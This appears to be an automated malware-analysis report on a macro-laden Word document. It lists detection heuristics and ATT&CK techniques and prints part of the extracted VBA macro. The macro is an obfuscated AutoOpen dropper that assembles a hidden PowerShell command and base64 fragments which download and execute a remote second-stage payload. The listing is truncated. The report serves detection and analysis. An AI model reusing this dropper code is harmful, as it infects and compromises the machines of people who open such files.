MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() function to execute a command. This command appears to decode and run a second-stage payload, as indicated by the obfuscated string construction and the ClamAV detection name 'Doc.Dropper.Agent-6453823-0'. The macro's intent is to download and execute a further payload.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6453823-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6453823-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6171 bytes |
SHA-256: b4a65af8f513432aa7c620648e7101edbdcc8b17110b9e3006226529469282c7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "uncategorized"
Sub AutoOpen()
Dim EL_RI As String
EL_OJ = Array("w", "s", "u", "p", "x", "b", "h", "n", "e", "i", " ", "a", "c", "o", "y", "d", "l", "t", "-", "r")
Dim CS_TE As String
CS_TE = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAApAHsA"
EL_RI = EL_RI + EL_OJ(3)
EL_RI = EL_RI + EL_OJ(13)
Dim BT_NC As String
BT_NC = "cgBlAHQAdQByAG4AIABbAF"
EL_RI = EL_RI + EL_OJ(0)
EL_RI = EL_RI + EL_OJ(8)
Dim BN_NG As String
BN_NG = "MAeQBzAHQAZQBtAC4"
EL_RI = EL_RI + EL_OJ(19)
EL_RI = EL_RI + EL_OJ(1)
Dim JR_RB As String
JR_RB = "AVABlAHgAdAAuAE"
EL_RI = EL_RI + EL_OJ(6)
EL_RI = EL_RI + EL_OJ(8)
Dim CT_NH As String
CT_NH = "UAbgBjAG8AZABpAG4AZwBdAD"
CL_SG = CL_SG & CS_TE & BT_NC & BN_NG & JR_RB & CT_NH
EL_RI = EL_RI + EL_OJ(16)
EL_RI = EL_RI + EL_OJ(16)
Dim AN_TH As String
AN_TH = "oAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIA"
EL_RI = EL_RI + EL_OJ(10)
EL_RI = EL_RI + EL_OJ(18)
Dim GQ_ND As String
GQ_ND = "aQBuAGcAKABbAFMAeQBzAHQAZQBtA"
EL_RI = EL_RI + EL_OJ(0)
EL_RI = EL_RI + EL_OJ(9)
Dim FN_OI As String
FN_OI = "C4AQwBvAG4AdgBlAHIAdABdADoAOg"
EL_RI = EL_RI + EL_OJ(7)
EL_RI = EL_RI + EL_OJ(15)
Dim IT_NC As String
IT_NC = "BGAHIAbwBtAEIAYQBzA"
EL_RI = EL_RI + EL_OJ(13)
EL_RI = EL_RI + EL_OJ(0)
Dim DK_SH As String
DK_SH = "GUANgA0AFMAdAByAGkAbgB"
CL_SG = CL_SG & AN_TH & GQ_ND & FN_OI & IT_NC & DK_SH
EL_RI = EL_RI + EL_OJ(1)
EL_RI = EL_RI + EL_OJ(17)
Dim JO_MC As String
JO_MC = "nACgAJAB4ACkAKQ"
EL_RI = EL_RI + EL_OJ(14)
EL_RI = EL_RI + EL_OJ(16)
Dim GM_LA As String
GM_LA = "B9ADsAaQBlAHgAIAAkACgA"
EL_RI = EL_RI + EL_OJ(8)
EL_RI = EL_RI + EL_OJ(10)
Dim DR_LJ As String
DR_LJ = "YQAgACQAKAAkACgAJAAoAGkAbgB2AG8AawBlAC0"
EL_RI = EL_RI + EL_OJ(6)
EL_RI = EL_RI + EL_OJ(9)
Dim AO_NF As String
AO_NF = "AdwBlAGIAc"
EL_RI = EL_RI + EL_OJ(15)
EL_RI = EL_RI + EL_OJ(15)
Dim DP_OE As String
DP_OE = "gBlAHEAdQB"
CL_SG = CL_SG & JO_MC & GM_LA & DR_LJ & AO_NF & DP_OE
EL_RI = EL_RI + EL_OJ(8)
EL_RI = EL_RI + EL_OJ(7)
Dim DQ_OD As String
DQ_OD = "lAHMAdAAgACcAaAB0AH"
EL_RI = EL_RI + EL_OJ(10)
EL_RI = EL_RI + EL_OJ(18)
Dim GK_KF As String
GK_KF = "QAcABzADoALwAvAHUAcw"
EL_RI = EL_RI + EL_OJ(8)
EL_RI = EL_RI + EL_OJ(4)
Dim DN_SH As String
DN_SH = "BwAHIAZAA1ADEANQAwA"
EL_RI = EL_RI + EL_OJ(8)
EL_RI = EL_RI + EL_OJ(12)
Dim IL_SA As String
IL_SA = "GMAZQBuAHQAcgBhAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlA"
EL_RI = EL_RI + EL_OJ(2)
EL_RI = EL_RI + EL_OJ(17)
Dim CN_KE As String
CN_KE = "C4AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8Ad"
CL_SG = CL_SG & DQ_OD & GK_KF & DN_SH & IL_SA & CN_KE
EL_RI = EL_RI + EL_OJ(9)
EL_RI = EL_RI + EL_OJ(13)
Dim EP_ND As String
EP_ND = "wBhAHIA"
EL_RI = EL_RI + EL_OJ(7)
EL_RI = EL_RI + EL_OJ(3)
Dim AM_KB As String
AM_KB = "ZQBoAG8Ad"
EL_RI = EL_RI + EL_OJ(13)
EL_RI = EL_RI + EL_OJ(16)
Dim HQ_QC As String
HQ_QC = "QBzAGUAPwAkAGYAaQBsAHQAZQByAD0AUABhA"
EL_RI = EL_RI + EL_OJ(9)
EL_RI = EL_RI + EL_OJ(12)
Dim IM_PF As String
IM_PF = "HIAdABpAHQAaQBvAG4ASwBl"
EL_RI = EL_RI + EL_OJ(14)
EL_RI = EL_RI + EL_OJ(10)
Dim FT_NJ As String
FT_NJ = "AHkAJQAyADAAZQBxACUAMgAwA"
CL_SG = CL_SG & EP_ND & AM_KB & HQ_QC & IM_PF & FT_NJ
EL_RI = EL_RI + EL_OJ(5)
EL_RI = EL_RI + EL_OJ(14)
Dim FL_MG As String
FL_MG = "CUAMgA3AHMAdABhAGcAZQAlADIANwAmACQAUwBlAG"
EL_RI = EL_RI + EL_OJ(3)
EL_RI = EL_RI + EL_OJ(11)
Dim DL_NE As String
DL_NE =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.